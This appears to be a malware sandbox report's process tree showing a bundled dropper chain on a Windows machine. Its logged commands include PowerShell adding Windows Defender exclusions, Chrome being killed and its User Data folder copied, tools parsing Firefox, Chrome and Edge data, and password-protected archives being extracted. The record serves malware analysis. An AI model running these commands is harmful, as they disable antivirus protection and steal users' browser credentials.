C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4120 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4728 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4484 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2336 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1756 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3856 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3924 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4756 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3872 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5108 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5128 /prefetch:111⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4596 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2372 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4428 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2672 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4284 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1812 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3936 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4404 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:111⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4544 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4144 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3412 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3896 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5228 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:111⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3980 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1664 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5700 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=5020 /prefetch:211⤵
-
C:\Users\Admin\AppData\Local\Temp\is-MG5JP.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-MG5JP.tmp\chashepro3.tmp" /SL5="$80658,2015144,58368,C:\Users\Admin\AppData\Local\Temp\hyfqtbi4hzd\chashepro3.exe" /VERYSILENT12⤵
-
-
-
-
-
-
-
C:\Windows\regedit.exeregedit /s chrome-set.reg7⤵
- Runs .reg file with regedit
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exeparse.exe -f json -b firefox7⤵
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exeparse.exe -f json -b chrome7⤵
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exeparse.exe -f json -b edge7⤵
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-1AEOA.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-1AEOA.tmp\PictureLAb.exe" /Verysilent3⤵
-
C:\Users\Admin\AppData\Local\Temp\is-2TQ7N.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-2TQ7N.tmp\PictureLAb.tmp" /SL5="$20490,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-1AEOA.tmp\PictureLAb.exe" /Verysilent4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-QTSDU.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-QTSDU.tmp\Setup.exe" /VERYSILENT5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-VHJ0G.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-VHJ0G.tmp\Setup.tmp" /SL5="$402B8,442598,358912,C:\Users\Admin\AppData\Local\Temp\is-QTSDU.tmp\Setup.exe" /VERYSILENT6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-SC4FS.tmp\kkkk.exe"C:\Users\Admin\AppData\Local\Temp\is-SC4FS.tmp\kkkk.exe" /S /UID=lab2147⤵
-
C:\Program Files\Windows Mail\NLITMBENEF\prolab.exe"C:\Program Files\Windows Mail\NLITMBENEF\prolab.exe" /VERYSILENT8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-CNVSI.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-CNVSI.tmp\prolab.tmp" /SL5="$40546,575243,216576,C:\Program Files\Windows Mail\NLITMBENEF\prolab.exe" /VERYSILENT9⤵
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Users\Admin\AppData\Local\Temp\f2-b7e4a-ee1-2d9a7-39a8911e80db5\Paevaenawoby.exe"C:\Users\Admin\AppData\Local\Temp\f2-b7e4a-ee1-2d9a7-39a8911e80db5\Paevaenawoby.exe"8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y43eklil.nvs\GcleanerWW.exe /mixone & exit9⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tywlot05.c3s\privacytools5.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\tywlot05.c3s\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\tywlot05.c3s\privacytools5.exe10⤵
-
C:\Users\Admin\AppData\Local\Temp\tywlot05.c3s\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\tywlot05.c3s\privacytools5.exe11⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fpdobw4o.24j\MultitimerFour.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\fpdobw4o.24j\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\fpdobw4o.24j\MultitimerFour.exe10⤵
-
C:\Users\Admin\AppData\Local\Temp\4DE9ZIP89I\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\4DE9ZIP89I\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10411⤵
-
C:\Users\Admin\AppData\Local\Temp\4DE9ZIP89I\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\4DE9ZIP89I\multitimer.exe" 1 3.1615014791.60432b87bd592 10412⤵
-
C:\Users\Admin\AppData\Local\Temp\4DE9ZIP89I\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\4DE9ZIP89I\multitimer.exe" 2 3.1615014791.60432b87bd59213⤵
-
C:\Users\Admin\AppData\Local\Temp\ers5ouugiku\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\ers5ouugiku\Setup3310.exe" /Verysilent /subid=57714⤵
-
C:\Users\Admin\AppData\Local\Temp\is-EUT1I.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-EUT1I.tmp\Setup3310.tmp" /SL5="$604A8,802346,56832,C:\Users\Admin\AppData\Local\Temp\ers5ouugiku\Setup3310.exe" /Verysilent /subid=57715⤵
-
C:\Users\Admin\AppData\Local\Temp\is-99M0E.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-99M0E.tmp\Setup.exe" /Verysilent16⤵
-
C:\Users\Admin\AppData\Local\Temp\is-92AJC.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-92AJC.tmp\Setup.tmp" /SL5="$504FC,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-99M0E.tmp\Setup.exe" /Verysilent17⤵
-
C:\Users\Admin\AppData\Local\Temp\is-KA873.tmp\ProPlugin.exe"C:\Users\Admin\AppData\Local\Temp\is-KA873.tmp\ProPlugin.exe" /Verysilent18⤵
-
C:\Users\Admin\AppData\Local\Temp\is-IUH4H.tmp\ProPlugin.tmp"C:\Users\Admin\AppData\Local\Temp\is-IUH4H.tmp\ProPlugin.tmp" /SL5="$50536,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-KA873.tmp\ProPlugin.exe" /Verysilent19⤵
-
C:\Users\Admin\AppData\Local\Temp\is-BTU36.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-BTU36.tmp\Setup.exe"20⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\main.exe"21⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-KA873.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-KA873.tmp\PictureLAb.exe" /Verysilent18⤵
-
C:\Users\Admin\AppData\Local\Temp\is-P632M.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-P632M.tmp\PictureLAb.tmp" /SL5="$1068C,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-KA873.tmp\PictureLAb.exe" /Verysilent19⤵
-
C:\Users\Admin\AppData\Local\Temp\is-QFS38.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-QFS38.tmp\Setup.exe" /VERYSILENT20⤵
-
C:\Users\Admin\AppData\Local\Temp\is-KF9B3.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-KF9B3.tmp\Setup.tmp" /SL5="$705C0,442598,358912,C:\Users\Admin\AppData\Local\Temp\is-QFS38.tmp\Setup.exe" /VERYSILENT21⤵
-
C:\Users\Admin\AppData\Local\Temp\is-0I0MB.tmp\kkkk.exe"C:\Users\Admin\AppData\Local\Temp\is-0I0MB.tmp\kkkk.exe" /S /UID=lab21422⤵
-
C:\Users\Admin\AppData\Local\Temp\6c-9188f-f3e-1a08d-678d1e8664739\Vilaxaeposhu.exe"C:\Users\Admin\AppData\Local\Temp\6c-9188f-f3e-1a08d-678d1e8664739\Vilaxaeposhu.exe"23⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\353olpmc.fjf\GcleanerWW.exe /mixone & exit24⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jzapnzxw.5yr\privacytools5.exe & exit24⤵
-
C:\Users\Admin\AppData\Local\Temp\jzapnzxw.5yr\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\jzapnzxw.5yr\privacytools5.exe25⤵
-
C:\Users\Admin\AppData\Local\Temp\jzapnzxw.5yr\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\jzapnzxw.5yr\privacytools5.exe26⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mvujtcmj.nx2\setup.exe /8-2222 & exit24⤵
-
C:\Users\Admin\AppData\Local\Temp\mvujtcmj.nx2\setup.exeC:\Users\Admin\AppData\Local\Temp\mvujtcmj.nx2\setup.exe /8-222225⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Holy-Wave"26⤵
-
-
C:\Program Files (x86)\Holy-Wave\7za.exe"C:\Program Files (x86)\Holy-Wave\7za.exe" e -p154.61.71.51 winamp-plugins.7z26⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Holy-Wave\setup.exe" -map "C:\Program Files (x86)\Holy-Wave\WinmonProcessMonitor.sys""26⤵
-
C:\Program Files (x86)\Holy-Wave\setup.exe"C:\Program Files (x86)\Holy-Wave\setup.exe" -map "C:\Program Files (x86)\Holy-Wave\WinmonProcessMonitor.sys"27⤵
-
-
-
C:\Program Files (x86)\Holy-Wave\7za.exe"C:\Program Files (x86)\Holy-Wave\7za.exe" e -p154.61.71.51 winamp.7z26⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d0p3u3r3.bjh\MultitimerFour.exe & exit24⤵
-
C:\Users\Admin\AppData\Local\Temp\d0p3u3r3.bjh\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\d0p3u3r3.bjh\MultitimerFour.exe25⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZO0YGCPVD\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\7ZO0YGCPVD\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10426⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZO0YGCPVD\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\7ZO0YGCPVD\multitimer.exe" 1 3.1615014975.60432c3faf8a0 10427⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZO0YGCPVD\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\7ZO0YGCPVD\multitimer.exe" 2 3.1615014975.60432c3faf8a028⤵
-
C:\Users\Admin\AppData\Local\Temp\3js2eql0ded\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\3js2eql0ded\askinstall24.exe"29⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe30⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe31⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y30⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\mbz2saqu1kj\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\mbz2saqu1kj\Setup3310.exe" /Verysilent /subid=57729⤵
-
C:\Users\Admin\AppData\Local\Temp\is-0EOUC.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-0EOUC.tmp\Setup3310.tmp" /SL5="$3058E,802346,56832,C:\Users\Admin\AppData\Local\Temp\mbz2saqu1kj\Setup3310.exe" /Verysilent /subid=57730⤵
-
C:\Users\Admin\AppData\Local\Temp\is-R6LDO.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-R6LDO.tmp\Setup.exe" /Verysilent31⤵
-
C:\Users\Admin\AppData\Local\Temp\is-SKPGL.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-SKPGL.tmp\Setup.tmp" /SL5="$707C8,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-R6LDO.tmp\Setup.exe" /Verysilent32⤵
-
C:\Users\Admin\AppData\Local\Temp\is-DLET9.tmp\ProPlugin.exe"C:\Users\Admin\AppData\Local\Temp\is-DLET9.tmp\ProPlugin.exe" /Verysilent33⤵
-
C:\Users\Admin\AppData\Local\Temp\is-4J16H.tmp\ProPlugin.tmp"C:\Users\Admin\AppData\Local\Temp\is-4J16H.tmp\ProPlugin.tmp" /SL5="$4096E,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-DLET9.tmp\ProPlugin.exe" /Verysilent34⤵
-
C:\Users\Admin\AppData\Local\Temp\is-8GE7N.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-8GE7N.tmp\Setup.exe"35⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\main.exe"36⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-DLET9.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-DLET9.tmp\PictureLAb.exe" /Verysilent33⤵
-
C:\Users\Admin\AppData\Local\Temp\is-HV5L6.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-HV5L6.tmp\PictureLAb.tmp" /SL5="$5096E,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-DLET9.tmp\PictureLAb.exe" /Verysilent34⤵
-
C:\Users\Admin\AppData\Local\Temp\is-TRA8E.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-TRA8E.tmp\Setup.exe" /VERYSILENT35⤵
-
C:\Users\Admin\AppData\Local\Temp\is-7FO3P.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-7FO3P.tmp\Setup.tmp" /SL5="$30A1A,442598,358912,C:\Users\Admin\AppData\Local\Temp\is-TRA8E.tmp\Setup.exe" /VERYSILENT36⤵
-
C:\Users\Admin\AppData\Local\Temp\is-BM2CV.tmp\kkkk.exe"C:\Users\Admin\AppData\Local\Temp\is-BM2CV.tmp\kkkk.exe" /S /UID=lab21437⤵
-
C:\Users\Admin\AppData\Local\Temp\7d-dcc34-0f9-1e9b0-2c0ccca486f68\Lihaecaepifae.exe"C:\Users\Admin\AppData\Local\Temp\7d-dcc34-0f9-1e9b0-2c0ccca486f68\Lihaecaepifae.exe"38⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3aarnulb.mk2\GcleanerWW.exe /mixone & exit39⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ghekwopl.njk\privacytools5.exe & exit39⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wkumpc2i.v2z\setup.exe /8-2222 & exit39⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-DLET9.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-DLET9.tmp\Delta.exe" /Verysilent33⤵
-
C:\Users\Admin\AppData\Local\Temp\is-UCE2T.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-UCE2T.tmp\Delta.tmp" /SL5="$40990,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-DLET9.tmp\Delta.exe" /Verysilent34⤵
-
C:\Users\Admin\AppData\Local\Temp\is-0HMBO.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-0HMBO.tmp\Setup.exe" /VERYSILENT35⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-DLET9.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-DLET9.tmp\zznote.exe" /Verysilent33⤵
-
C:\Users\Admin\AppData\Local\Temp\is-3H8FU.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-3H8FU.tmp\zznote.tmp" /SL5="$20A98,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-DLET9.tmp\zznote.exe" /Verysilent34⤵
-
C:\Users\Admin\AppData\Local\Temp\is-QVG65.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-QVG65.tmp\jg4_4jaa.exe" /silent35⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vsejzqef1f0\s1zvnbrt1bm.exe"C:\Users\Admin\AppData\Local\Temp\vsejzqef1f0\s1zvnbrt1bm.exe" /ustwo INSTALL29⤵
-
-
C:\Users\Admin\AppData\Local\Temp\hyfqtbi4hzd\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\hyfqtbi4hzd\chashepro3.exe" /VERYSILENT29⤵
-
-
C:\Users\Admin\AppData\Local\Temp\ucuejts2jj5\safebits.exe"C:\Users\Admin\AppData\Local\Temp\ucuejts2jj5\safebits.exe" /S /pubid=1 /subid=45129⤵
-
-
C:\Users\Admin\AppData\Local\Temp\4iycbpjfi2b\vict.exe"C:\Users\Admin\AppData\Local\Temp\4iycbpjfi2b\vict.exe" /VERYSILENT /id=53529⤵
-
C:\Users\Admin\AppData\Local\Temp\is-6V3UG.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-6V3UG.tmp\vict.tmp" /SL5="$1088A,870426,780800,C:\Users\Admin\AppData\Local\Temp\4iycbpjfi2b\vict.exe" /VERYSILENT /id=53530⤵
-
C:\Users\Admin\AppData\Local\Temp\is-0ENP0.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-0ENP0.tmp\wimapi.exe" 53531⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sljxztw5eem\app.exe"C:\Users\Admin\AppData\Local\Temp\sljxztw5eem\app.exe" /8-2329⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Muddy-Fire"30⤵
-
-
C:\Program Files (x86)\Muddy-Fire\7za.exe"C:\Program Files (x86)\Muddy-Fire\7za.exe" e -p154.61.71.51 winamp-plugins.7z30⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Muddy-Fire\app.exe" -map "C:\Program Files (x86)\Muddy-Fire\WinmonProcessMonitor.sys""30⤵
-
C:\Program Files (x86)\Muddy-Fire\app.exe"C:\Program Files (x86)\Muddy-Fire\app.exe" -map "C:\Program Files (x86)\Muddy-Fire\WinmonProcessMonitor.sys"31⤵
-
-
-
C:\Program Files (x86)\Muddy-Fire\7za.exe"C:\Program Files (x86)\Muddy-Fire\7za.exe" e -p154.61.71.51 winamp.7z30⤵
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-KA873.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-KA873.tmp\Delta.exe" /Verysilent18⤵
-
